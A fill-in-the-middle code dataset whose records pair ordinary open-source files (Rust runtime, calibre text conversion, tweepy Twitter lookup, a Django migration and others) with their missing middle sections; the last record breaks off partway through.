<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. #![crate_name = "rustrt"] #![license = "MIT/ASL2"] #![crate_type = "rlib"] #![crate_type = "dylib"] #![doc(html_logo_url = "http://www.rust-lang.org/logos/rust-logo-128x128-blk-v2.png", html_favicon_url = "http://www.rust-lang.org/favicon.ico", html_root_url = "http://doc.rust-lang.org/master/")] #![feature(macro_rules, phase, globs, thread_local, managed_boxes, asm)] #![feature(linkage, lang_items, unsafe_destructor, default_type_params)] #![feature(import_shadowing)] #![no_std] #![experimental] #[phase(plugin, link)] extern crate core; extern crate alloc; extern crate libc; extern crate collections; #[cfg(test)] extern crate realrustrt = "rustrt"; #[cfg(test)] extern crate test; #[cfg(test)] extern crate native; #[cfg(test)] #[phase(plugin, link)] extern crate std; pub use self::util::{Stdio, Stdout, Stderr}; pub use self::unwind::{begin_unwind, begin_unwind_fmt}; use core::prelude::*; use alloc::boxed::Box; use core::any::Any; use task::{Task, BlockedTask, TaskOpts}; mod macros; mod at_exit_imp; mod local_ptr; mod thread_local_storage; mod util; mod libunwind; pub mod args; pub mod bookkeeping; pub mod c_str; pub mod exclusive; pub mod local; pub mod local_data; pub mod local_heap; pub mod mutex; pub mod rtio; pub mod stack; pub mod task; pub mod thread; pub mod unwind; /// The interface to the current runtime. /// /// This trait is used as the abstraction between 1:1 and M:N scheduling. The /// two independent crates, libnative and libgreen, both have objects which /// implement this trait. The goal of this trait is to encompass all the /// fundamental differences in functionality between the 1:1 and M:N runtime /// modes. pub trait Runtime { // Necessary scheduling functions, used for channels and blocking I/O // (sometimes). fn yield_now(self: Box<Self>, cur_task: Box<Task>); fn maybe_yield(self: Box<Self>, cur_task: Box<Task>); fn deschedule(self: Box<Self>, times: uint, cur_task: Box<Task>,<|fim▁hole|> fn reawaken(self: Box<Self>, to_wake: Box<Task>); // Miscellaneous calls which are very different depending on what context // you're in. fn spawn_sibling(self: Box<Self>, cur_task: Box<Task>, opts: TaskOpts, f: proc():Send); fn local_io<'a>(&'a mut self) -> Option<rtio::LocalIo<'a>>; /// The (low, high) edges of the current stack. fn stack_bounds(&self) -> (uint, uint); // (lo, hi) fn can_block(&self) -> bool; // FIXME: This is a serious code smell and this should not exist at all. fn wrap(self: Box<Self>) -> Box<Any+'static>; } /// The default error code of the rust runtime if the main task fails instead /// of exiting cleanly. pub static DEFAULT_ERROR_CODE: int = 101; /// One-time runtime initialization. /// /// Initializes global state, including frobbing /// the crate's logging flags, registering GC /// metadata, and storing the process arguments. pub fn init(argc: int, argv: *const *const u8) { // FIXME: Derefing these pointers is not safe. // Need to propagate the unsafety to `start`. unsafe { args::init(argc, argv); local_ptr::init(); at_exit_imp::init(); } // FIXME(#14344) this shouldn't be necessary collections::fixme_14344_be_sure_to_link_to_collections(); alloc::fixme_14344_be_sure_to_link_to_collections(); libc::issue_14344_workaround(); } /// Enqueues a procedure to run when the runtime is cleaned up /// /// The procedure passed to this function will be executed as part of the /// runtime cleanup phase. For normal rust programs, this means that it will run /// after all other tasks have exited. /// /// The procedure is *not* executed with a local `Task` available to it, so /// primitives like logging, I/O, channels, spawning, etc, are *not* available. /// This is meant for "bare bones" usage to clean up runtime details, this is /// not meant as a general-purpose "let's clean everything up" function. /// /// It is forbidden for procedures to register more `at_exit` handlers when they /// are running, and doing so will lead to a process abort. pub fn at_exit(f: proc():Send) { at_exit_imp::push(f); } /// One-time runtime cleanup. /// /// This function is unsafe because it performs no checks to ensure that the /// runtime has completely ceased running. It is the responsibility of the /// caller to ensure that the runtime is entirely shut down and nothing will be /// poking around at the internal components. /// /// Invoking cleanup while portions of the runtime are still in use may cause /// undefined behavior. pub unsafe fn cleanup() { bookkeeping::wait_for_other_tasks(); at_exit_imp::run(); args::cleanup(); local_ptr::cleanup(); } // FIXME: these probably shouldn't be public... #[doc(hidden)] pub mod shouldnt_be_public { #[cfg(not(test))] pub use super::local_ptr::native::maybe_tls_key; #[cfg(not(windows), not(target_os = "android"), not(target_os = "ios"))] pub use super::local_ptr::compiled::RT_TLS_PTR; } #[cfg(not(test))] mod std { pub use core::{fmt, option, cmp}; }<|fim▁end|>
f: |BlockedTask| -> Result<(), BlockedTask>);
<|file_name|>MaxArithmeticProgression.py<|end_file_name|><|fim▁begin|>''' Created on May 20, 2012 @author: Jason Huang ''' <|fim▁hole|>#The sequence S1, S2, ¡­, Sk is called an arithmetic progression if #Sj+1 ¨C Sj is a constant if __name__ == '__main__': pass<|fim▁end|>
#Given an array of integers A, give an algorithm to find the longest Arithmetic progression in it, i.e find a sequence i1 < i2 < ¡­ < ik, such that #A[i1], A[i2], ¡­, A[ik] forms an arithmetic progression, and k is the largest possible.
<|file_name|>RunProcessCommand.java<|end_file_name|><|fim▁begin|>/* * Copyright 2012-2018 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.boot.cli.command.shell; import java.io.IOException; import java.util.Arrays; import java.util.Collection; import org.springframework.boot.cli.command.AbstractCommand; import org.springframework.boot.cli.command.Command; import org.springframework.boot.cli.command.status.ExitStatus; import org.springframework.boot.loader.tools.RunProcess; import org.springframework.util.StringUtils; /** * Special {@link Command} used to run a process from the shell. NOTE: this command is not * directly installed into the shell. * * @author Phillip Webb */ class RunProcessCommand extends AbstractCommand { private final String[] command; private volatile RunProcess process; <|fim▁hole|> @Override public ExitStatus run(String... args) throws Exception { return run(Arrays.asList(args)); } protected ExitStatus run(Collection<String> args) throws IOException { this.process = new RunProcess(this.command); int code = this.process.run(true, StringUtils.toStringArray(args)); if (code == 0) { return ExitStatus.OK; } else { return new ExitStatus(code, "EXTERNAL_ERROR"); } } public boolean handleSigInt() { return this.process.handleSigInt(); } }<|fim▁end|>
RunProcessCommand(String... command) { super(null, null); this.command = command; }
<|file_name|>options.js<|end_file_name|><|fim▁begin|>angular.module('Reader.services.options', []) .factory('options', function($rootScope, $q) { var controllerObj = {}; options.onChange(function (changes) { $rootScope.$apply(function () { for (var property in changes) { controllerObj[property] = changes[property].newValue; } }); }); return { get: function (callback) { options.get(function (values) { $rootScope.$apply(function () { angular.copy(values, controllerObj); if (callback instanceof Function) { callback(controllerObj); } }); }); return controllerObj; }, <|fim▁hole|> enableSync: options.enableSync, isSyncEnabled: options.isSyncEnabled }; });<|fim▁end|>
set: function (values) { options.set(values); },
<|file_name|>processor.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- __license__ = 'GPL v3' __copyright__ = '2009, John Schember <[email protected]>' __docformat__ = 'restructuredtext en' ''' Read content from txt file. ''' import os, re from calibre import prepare_string_for_xml, isbytestring from calibre.ebooks.metadata.opf2 import OPFCreator from calibre.ebooks.conversion.preprocess import DocAnalysis from calibre.utils.cleantext import clean_ascii_chars HTML_TEMPLATE = u'<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>%s </title></head><body>\n%s\n</body></html>' def clean_txt(txt): ''' Run transformations on the text to put it into consistent state. ''' if isbytestring(txt): txt = txt.decode('utf-8', 'replace') # Strip whitespace from the end of the line. Also replace # all line breaks with \n. txt = '\n'.join([line.rstrip() for line in txt.splitlines()]) # Replace whitespace at the beginning of the line with &nbsp; txt = re.sub('(?m)(?<=^)([ ]{2,}|\t+)(?=.)', '&nbsp;' * 4, txt) # Condense redundant spaces txt = re.sub('[ ]{2,}', ' ', txt) # Remove blank space from the beginning and end of the document. txt = re.sub('^\s+(?=.)', '', txt) txt = re.sub('(?<=.)\s+$', '', txt) # Remove excessive line breaks. txt = re.sub('\n{5,}', '\n\n\n\n', txt) #remove ASCII invalid chars : 0 to 8 and 11-14 to 24 txt = clean_ascii_chars(txt) return txt def split_txt(txt, epub_split_size_kb=0): ''' Ensure there are split points for converting to EPUB. A misdetected paragraph type can result in the entire document being one giant paragraph. In this case the EPUB parser will not be able to determine where to split the file to accomidate the EPUB file size limitation and will fail. ''' #Takes care if there is no point to split if epub_split_size_kb > 0: if isinstance(txt, unicode): txt = txt.encode('utf-8') length_byte = len(txt) #Calculating the average chunk value for easy splitting as EPUB (+2 as a safe margin) chunk_size = long(length_byte / (int(length_byte / (epub_split_size_kb * 1024) ) + 2 )) #if there are chunks with a superior size then go and break if (len(filter(lambda x: len(x) > chunk_size, txt.split('\n\n')))) : txt = '\n\n'.join([split_string_separator(line, chunk_size) for line in txt.split('\n\n')]) if isbytestring(txt): txt = txt.decode('utf-8') return txt def convert_basic(txt, title='', epub_split_size_kb=0): ''' Converts plain text to html by putting all paragraphs in <p> tags. It condense and retains blank lines when necessary. Requires paragraphs to be in single line format. ''' txt = clean_txt(txt) txt = split_txt(txt, epub_split_size_kb) lines = [] blank_count = 0 # Split into paragraphs based on having a blank line between text. for line in txt.split('\n'): if line.strip(): blank_count = 0 lines.append(u'<p>%s</p>' % prepare_string_for_xml(line.replace('\n', ' '))) else: blank_count += 1 if blank_count == 2: lines.append(u'<p>&nbsp;</p>') return HTML_TEMPLATE % (title, u'\n'.join(lines)) def convert_markdown(txt, title='', disable_toc=False): from calibre.ebooks.markdown import markdown extensions=['footnotes', 'tables']<|fim▁hole|> extensions, safe_mode=False) return HTML_TEMPLATE % (title, md.convert(txt)) def convert_textile(txt, title=''): from calibre.ebooks.textile import textile html = textile(txt, encoding='utf-8') return HTML_TEMPLATE % (title, html) def normalize_line_endings(txt): txt = txt.replace('\r\n', '\n') txt = txt.replace('\r', '\n') return txt def separate_paragraphs_single_line(txt): txt = txt.replace('\n', '\n\n') return txt def separate_paragraphs_print_formatted(txt): txt = re.sub(u'(?miu)^(?P<indent>\t+|[ ]{2,})(?=.)', lambda mo: '\n%s' % mo.group('indent'), txt) return txt def separate_hard_scene_breaks(txt): def sep_break(line): if len(line.strip()) > 0: return '\n%s\n' % line else: return line txt = re.sub(u'(?miu)^[ \t-=~\/_]+$', lambda mo: sep_break(mo.group()), txt) return txt def block_to_single_line(txt): txt = re.sub(r'(?<=.)\n(?=.)', ' ', txt) return txt def preserve_spaces(txt): ''' Replaces spaces multiple spaces with &nbsp; entities. ''' txt = re.sub('(?P<space>[ ]{2,})', lambda mo: ' ' + ('&nbsp;' * (len(mo.group('space')) - 1)), txt) txt = txt.replace('\t', '&nbsp;&nbsp;&nbsp;&nbsp;') return txt def remove_indents(txt): ''' Remove whitespace at the beginning of each line. ''' txt = re.sub('(?miu)^\s+', '', txt) return txt def opf_writer(path, opf_name, manifest, spine, mi): opf = OPFCreator(path, mi) opf.create_manifest(manifest) opf.create_spine(spine) with open(os.path.join(path, opf_name), 'wb') as opffile: opf.render(opffile) def split_string_separator(txt, size): ''' Splits the text by putting \n\n at the point size. ''' if len(txt) > size: txt = ''.join([re.sub(u'\.(?P<ends>[^.]*)$', '.\n\n\g<ends>', txt[i:i+size], 1) for i in xrange(0, len(txt), size)]) return txt def detect_paragraph_type(txt): ''' Tries to determine the paragraph type of the document. block: Paragraphs are separated by a blank line. single: Each line is a paragraph. print: Each paragraph starts with a 2+ spaces or a tab and ends when a new paragraph is reached. unformatted: most lines have hard line breaks, few/no blank lines or indents returns block, single, print, unformatted ''' txt = txt.replace('\r\n', '\n') txt = txt.replace('\r', '\n') txt_line_count = len(re.findall('(?mu)^\s*.+$', txt)) # Check for hard line breaks - true if 55% of the doc breaks in the same region docanalysis = DocAnalysis('txt', txt) hardbreaks = docanalysis.line_histogram(.55) if hardbreaks: # Determine print percentage tab_line_count = len(re.findall('(?mu)^(\t|\s{2,}).+$', txt)) print_percent = tab_line_count / float(txt_line_count) # Determine block percentage empty_line_count = len(re.findall('(?mu)^\s*$', txt)) block_percent = empty_line_count / float(txt_line_count) # Compare the two types - the type with the larger number of instances wins # in cases where only one or the other represents the vast majority of the document neither wins if print_percent >= block_percent: if .15 <= print_percent <= .75: return 'print' elif .15 <= block_percent <= .75: return 'block' # Assume unformatted text with hardbreaks if nothing else matches return 'unformatted' # return single if hardbreaks is false return 'single' def detect_formatting_type(txt): ''' Tries to determine the formatting of the document. markdown: Markdown formatting is used. textile: Textile formatting is used. heuristic: When none of the above formatting types are detected heuristic is returned. ''' # Keep a count of the number of format specific object # that are found in the text. markdown_count = 0 textile_count = 0 # Check for markdown # Headings markdown_count += len(re.findall('(?mu)^#+', txt)) markdown_count += len(re.findall('(?mu)^=+$', txt)) markdown_count += len(re.findall('(?mu)^-+$', txt)) # Images markdown_count += len(re.findall('(?u)!\[.*?\](\[|\()', txt)) # Links markdown_count += len(re.findall('(?u)^|[^!]\[.*?\](\[|\()', txt)) # Check for textile # Headings textile_count += len(re.findall(r'(?mu)^h[1-6]\.', txt)) # Block quote. textile_count += len(re.findall(r'(?mu)^bq\.', txt)) # Images textile_count += len(re.findall(r'(?mu)(?<=\!)\S+(?=\!)', txt)) # Links textile_count += len(re.findall(r'"[^"]*":\S+', txt)) # paragraph blocks textile_count += len(re.findall(r'(?mu)^p(<|<>|=|>)?\. ', txt)) # Decide if either markdown or textile is used in the text # based on the number of unique formatting elements found. if markdown_count > 5 or textile_count > 5: if markdown_count > textile_count: return 'markdown' else: return 'textile' return 'heuristic'<|fim▁end|>
if not disable_toc: extensions.append('toc') md = markdown.Markdown(
<|file_name|>game.js<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|>
//= require phaser
<|file_name|>observableview.ts<|end_file_name|><|fim▁begin|>/** * mobservable * (c) 2015 - Michel Weststrate * https://github.com/mweststrate/mobservable */ namespace mobservable { export namespace _ { export function throwingViewSetter() { throw new Error(`[mobservable.view '${this.context.name}'] View functions do not accept new values`); } export class ObservableView<T> extends ViewNode { private isComputing = false; private hasError = false; protected _value: T; protected changeEvent = new SimpleEventEmitter(); constructor(protected func:()=>T, private scope: Object, context:Mobservable.IContextInfoStruct, private compareStructural) { super(context); } get():T { if (this.isComputing) throw new Error(`[mobservable.view '${this.context.name}'] Cycle detected`); if (this.isSleeping) { if (_.isComputingView()) { // somebody depends on the outcome of this computation this.wakeUp(); // note: wakeup triggers a compute this.notifyObserved(); } else { // nobody depends on this computable; // so just compute fresh value and continue to sleep this.wakeUp(); this.tryToSleep(); } } else { // we are already up to date, somebody is just inspecting our current value this.notifyObserved(); } if (this.hasCycle) throw new Error(`[mobservable.view '${this.context.name}'] Cycle detected`); if (this.hasError) {<|fim▁hole|> return this._value; } set() { throwingViewSetter.call(this); } compute() { var newValue:T; try { // this cycle detection mechanism is primarily for lazy computed values; other cycles are already detected in the dependency tree if (this.isComputing) throw new Error(`[mobservable.view '${this.context.name}'] Cycle detected`); this.isComputing = true; newValue = this.func.call(this.scope); this.hasError = false; } catch (e) { this.hasError = true; console.error(`[mobservable.view '${this.context.name}'] Caught error during computation: `, e, "View function:", this.func.toString()); console.trace(); if (e instanceof Error) newValue = e; else { newValue = <T><any> new Error(`[mobservable.view '${this.context.name}'] Error during computation (see error.cause) in ` + this.func.toString()); (<any>newValue).cause = e; } } this.isComputing = false; const changed = this.compareStructural ? !deepEquals(newValue, this._value) : newValue !== this._value; if (changed) { var oldValue = this._value; this._value = newValue; this.changeEvent.emit(newValue, oldValue); return true; } return false; } observe(listener:(newValue:T, oldValue:T)=>void, fireImmediately=false):Lambda { this.setRefCount(+1); // awake if (fireImmediately) listener(this.get(), undefined); var disposer = this.changeEvent.on(listener); return once(() => { this.setRefCount(-1); disposer(); }); } asPropertyDescriptor(): PropertyDescriptor { return { configurable: false, enumerable: false, get: () => this.get(), set: throwingViewSetter } } toString() { return `ComputedObservable[${this.context.name}:${this._value}] ${this.func.toString()}`; } } } }<|fim▁end|>
if (logLevel > 0) console.error(`[mobservable.view '${this.context.name}'] Rethrowing caught exception to observer: ${this._value}${(<any>this._value).cause||''}`); throw this._value; }
<|file_name|>functions.py<|end_file_name|><|fim▁begin|># twitter/functions.py # Brought to you by We Vote. Be good. # -*- coding: UTF-8 -*- import tweepy import wevote_functions.admin from config.base import get_environment_variable from exception.models import handle_exception from wevote_functions.functions import positive_value_exists logger = wevote_functions.admin.get_logger(__name__) WE_VOTE_SERVER_ROOT_URL = get_environment_variable("WE_VOTE_SERVER_ROOT_URL") TWITTER_CONSUMER_KEY = get_environment_variable("TWITTER_CONSUMER_KEY") TWITTER_CONSUMER_SECRET = get_environment_variable("TWITTER_CONSUMER_SECRET") TWITTER_ACCESS_TOKEN = get_environment_variable("TWITTER_ACCESS_TOKEN") TWITTER_ACCESS_TOKEN_SECRET = get_environment_variable("TWITTER_ACCESS_TOKEN_SECRET") TWITTER_USER_NOT_FOUND_LOG_RESPONSES = [ "{'code': 50, 'message': 'User not found.'}", "User not found." ] TWITTER_USER_SUSPENDED_LOG_RESPONSES = [ "{'code': 63, 'message': 'User has been suspended.'}", "User has been suspended." ] def retrieve_twitter_user_info(twitter_user_id, twitter_handle=''): status = "" success = True twitter_user_not_found_in_twitter = False twitter_user_suspended_by_twitter = False write_to_server_logs = False # December 2021: Using the Twitter 1.1 API for OAuthHandler, since all other 2.0 apis that we need are not # yet available. # client = tweepy.Client( # consumer_key=TWITTER_CONSUMER_KEY, # consumer_secret=TWITTER_CONSUMER_SECRET, # access_token=TWITTER_ACCESS_TOKEN, # access_token_secret=TWITTER_ACCESS_TOKEN_SECRET) auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET) auth.set_access_token(TWITTER_ACCESS_TOKEN, TWITTER_ACCESS_TOKEN_SECRET) api = tweepy.API(auth, timeout=10) # Strip out the twitter handles "False" or "None" if twitter_handle is False: twitter_handle = '' elif twitter_handle is None: twitter_handle = '' elif twitter_handle: twitter_handle_lower = twitter_handle.lower() if twitter_handle_lower == 'false' or twitter_handle_lower == 'none': twitter_handle = '' twitter_handle_found = False twitter_json = {} from wevote_functions.functions import convert_to_int twitter_user_id = convert_to_int(twitter_user_id) try: if positive_value_exists(twitter_handle): twitter_user = api.get_user(screen_name=twitter_handle) twitter_json = twitter_user._json success = True # status += 'TWITTER_HANDLE_SUCCESS-' + str(twitter_handle) + " " twitter_handle_found = True twitter_user_id = twitter_user.id # Integer value. id_str would be the String value elif positive_value_exists(twitter_user_id): twitter_user = api.get_user(user_id=twitter_user_id) twitter_json = twitter_user._json success = True # status += 'TWITTER_USER_ID_SUCCESS-' + str(twitter_user_id) + " " twitter_handle_found = True else: twitter_json = {} success = False status += 'TWITTER_RETRIEVE_NOT_SUCCESSFUL-MISSING_VARIABLE ' twitter_handle_found = False except tweepy.TooManyRequests as rate_limit_error: success = False status += 'TWITTER_RATE_LIMIT_ERROR: ' + str(rate_limit_error) + " " handle_exception(rate_limit_error, logger=logger, exception_message=status)<|fim▁hole|> except tweepy.errors.HTTPException as error_instance: success = False status += 'TWITTER_HTTP_ERROR ' handle_exception(error_instance, logger=logger, exception_message=status) except tweepy.errors.TweepyException as error_instance: success = False status += "[TWEEP_ERROR: " status += twitter_handle + " " if positive_value_exists(twitter_handle) else "" status += str(twitter_user_id) + " " if positive_value_exists(twitter_user_id) else " " if error_instance: status += str(error_instance) + " " if error_instance and hasattr(error_instance, 'args'): try: error_tuple = error_instance.args for error_dict in error_tuple: for one_error in error_dict: status += '[' + one_error['message'] + '] ' if one_error['message'] in TWITTER_USER_NOT_FOUND_LOG_RESPONSES: twitter_user_not_found_in_twitter = True elif one_error['message'] in TWITTER_USER_SUSPENDED_LOG_RESPONSES: twitter_user_suspended_by_twitter = True else: write_to_server_logs = True except Exception as e: status += "PROBLEM_PARSING_TWEEPY_ERROR: " + str(e) + " " write_to_server_logs = True else: write_to_server_logs = True status += "]" if write_to_server_logs: handle_exception(error_instance, logger=logger, exception_message=status) except Exception as e: success = False status += "TWEEPY_EXCEPTION: " + str(e) + " " handle_exception(e, logger=logger, exception_message=status) try: if positive_value_exists(twitter_json.get('profile_banner_url')): # Dec 2019, https://developer.twitter.com/en/docs/accounts-and-users/user-profile-images-and-banners banner = twitter_json.get('profile_banner_url') + '/1500x500' twitter_json['profile_banner_url'] = banner except Exception as e: status += "FAILED_PROFILE_BANNER_URL: " + str(e) + " " results = { 'status': status, 'success': success, 'twitter_handle': twitter_handle, 'twitter_handle_found': twitter_handle_found, 'twitter_json': twitter_json, 'twitter_user_id': twitter_user_id, 'twitter_user_not_found_in_twitter': twitter_user_not_found_in_twitter, 'twitter_user_suspended_by_twitter': twitter_user_suspended_by_twitter, } return results<|fim▁end|>
<|file_name|>checkFile.ts<|end_file_name|><|fim▁begin|>const fileTypeExts = { pdf: ['pdf'], image: ['jpg', 'jpeg', 'png'], pdfImage: ['pdf', 'jpg', 'jpeg', 'png'], }; const fileTypeAlerts = { pdf: 'Please choose a pdf document', image: 'Please choose an image file', pdfImage: 'Please choose a pdf document or image file', }; export default function checkFile(inputFiles, value, maxKb, fileType) { if ( (window as any).FileReader && inputFiles &&<|fim▁hole|> ) { alert(`The max file size is ${(maxKb || 500) / 1000}MB, please try again.`); return false; } const ext = value .split('.') .pop() .toLowerCase(); if (fileTypeExts[fileType] && !fileTypeExts[fileType].includes(ext)) { alert(fileTypeAlerts[fileType]); return false; } return true; }<|fim▁end|>
inputFiles[0] && inputFiles[0].size > (maxKb || 500) * 1000
<|file_name|>2PopDNAnorec_1_76.js<|end_file_name|><|fim▁begin|>USETEXTLINKS = 1 STARTALLOPEN = 0 WRAPTEXT = 1 PRESERVESTATE = 0 HIGHLIGHT = 1 ICONPATH = 'file:////Users/eric/github/popgenDB/sims_for_structure_paper/2PopDNAnorec_0.5_1000/' //change if the gif's folder is a subfolder, for example: 'images/' foldersTree = gFld("<i>ARLEQUIN RESULTS (2PopDNAnorec_1_76.arp)</i>", "") insDoc(foldersTree, gLnk("R", "Arlequin log file", "Arlequin_log.txt")) aux1 = insFld(foldersTree, gFld("Run of 31/07/18 at 17:02:31", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31"))<|fim▁hole|> insDoc(aux2, gLnk("R", "AMOVA", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31_pop_amova")) insDoc(aux2, gLnk("R", "Pairwise distances", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31_pop_pairw_diff"))<|fim▁end|>
insDoc(aux1, gLnk("R", "Settings", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31_run_information")) aux2 = insFld(aux1, gFld("Genetic structure (samp=pop)", "2PopDNAnorec_1_76.xml#31_07_18at17_02_31_pop_gen_struct"))
<|file_name|>0001_squashed_0020_add_app_permissions.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # Generated by Django 1.11.20 on 2019-12-09 00:06 from __future__ import unicode_literals from django.conf import settings import django.core.files.storage from django.db import migrations, models import django.db.migrations.operations.special import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): replaces = [ ("crashmanager", "0001_initial"), ("crashmanager", "0002_bugzillatemplate_security"), ("crashmanager", "0003_bucket_frequent"), ("crashmanager", "0004_add_tool"), ("crashmanager", "0005_add_user"), ("crashmanager", "0006_user_defaultproviderid"), ("crashmanager", "0007_bugzillatemplate_comment"), ("crashmanager", "0008_crashentry_crashaddressnumeric"), ("crashmanager", "0009_copy_crashaddress"), ("crashmanager", "0010_bugzillatemplate_security_group"), ("crashmanager", "0011_bucket_permanent"), ("crashmanager", "0012_crashentry_cachedcrashinfo"), ("crashmanager", "0013_init_cachedcrashinfo"), ("crashmanager", "0014_bugzillatemplate_testcase_filename"), ("crashmanager", "0015_crashentry_triagedonce"), ("crashmanager", "0016_auto_20160308_1500"), ("crashmanager", "0017_user_restricted"), ("crashmanager", "0018_auto_20170620_1503"), ("crashmanager", "0019_bucket_optimizedsignature"), ("crashmanager", "0020_add_app_permissions"), ] initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name="Bucket", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("signature", models.TextField()), ("shortDescription", models.CharField(blank=True, max_length=1023)), ], ), migrations.CreateModel( name="Bug", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("externalId", models.CharField(blank=True, max_length=255)), ("closed", models.DateTimeField(blank=True, null=True)), ], ), migrations.CreateModel( name="BugProvider", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("classname", models.CharField(max_length=255)), ("hostname", models.CharField(max_length=255)), ("urlTemplate", models.CharField(max_length=1023)), ], ), migrations.CreateModel( name="BugzillaTemplate", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.TextField()), ("product", models.TextField()), ("component", models.TextField()), ("summary", models.TextField(blank=True)), ("version", models.TextField()), ("description", models.TextField(blank=True)), ("whiteboard", models.TextField(blank=True)), ("keywords", models.TextField(blank=True)), ("op_sys", models.TextField(blank=True)), ("platform", models.TextField(blank=True)), ("priority", models.TextField(blank=True)), ("severity", models.TextField(blank=True)), ("alias", models.TextField(blank=True)), ("cc", models.TextField(blank=True)), ("assigned_to", models.TextField(blank=True)), ("qa_contact", models.TextField(blank=True)), ("target_milestone", models.TextField(blank=True)), ("attrs", models.TextField(blank=True)), ("security", models.BooleanField(default=False)), ], ), migrations.CreateModel( name="Client", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=255)), ], ), migrations.CreateModel( name="CrashEntry", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("created", models.DateTimeField(default=django.utils.timezone.now)), ("rawStdout", models.TextField(blank=True)), ("rawStderr", models.TextField(blank=True)), ("rawCrashData", models.TextField(blank=True)), ("metadata", models.TextField(blank=True)), ("env", models.TextField(blank=True)), ("args", models.TextField(blank=True)), ("crashAddress", models.CharField(blank=True, max_length=255)), ("shortSignature", models.CharField(blank=True, max_length=255)), ( "bucket", models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Bucket", ), ), ( "client", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Client", ), ), ], ), migrations.CreateModel( name="OS", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=63)), ("version", models.CharField(blank=True, max_length=127, null=True)), ], ), migrations.CreateModel( name="Platform", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=63)), ], ), migrations.CreateModel( name="Product", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=63)), ("version", models.CharField(blank=True, max_length=127, null=True)), ], ), migrations.CreateModel( name="TestCase", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ( "test", models.FileField( storage=django.core.files.storage.FileSystemStorage( location=None ), upload_to=b"tests", ), ), ("size", models.IntegerField(default=0)), ("quality", models.IntegerField(default=0)), ("isBinary", models.BooleanField(default=False)), ], ), migrations.AddField( model_name="crashentry", name="os", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.OS" ), ), migrations.AddField( model_name="crashentry", name="platform", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Platform" ), ), migrations.AddField( model_name="crashentry", name="product", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Product" ), ), migrations.AddField( model_name="crashentry", name="testcase", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to="crashmanager.TestCase", ), ), migrations.AddField( model_name="bug", name="externalType", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="crashmanager.BugProvider", ), ), migrations.AddField( model_name="bucket", name="bug", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Bug", ), ), migrations.AddField( model_name="bucket", name="frequent", field=models.BooleanField(default=False), ), migrations.CreateModel( name="Tool", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=63)), ], ), migrations.CreateModel( name="User", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("defaultTemplateId", models.IntegerField(default=0)), ("defaultToolsFilter", models.ManyToManyField(to="crashmanager.Tool")), ( "user", models.OneToOneField( on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, ), ), ("defaultProviderId", models.IntegerField(default=1)), ], ), migrations.AddField( model_name="crashentry", name="tool", field=models.ForeignKey( default=1, on_delete=django.db.models.deletion.CASCADE, to="crashmanager.Tool", ), preserve_default=False, ), migrations.AddField( model_name="bugzillatemplate",<|fim▁hole|> migrations.AddField( model_name="crashentry", name="crashAddressNumeric", field=models.BigIntegerField(blank=True, null=True), ), migrations.AddField( model_name="bugzillatemplate", name="security_group", field=models.TextField(blank=True, default=""), preserve_default=False, ), migrations.AddField( model_name="bucket", name="permanent", field=models.BooleanField(default=False), ), migrations.AddField( model_name="crashentry", name="cachedCrashInfo", field=models.TextField(blank=True, null=True), ), 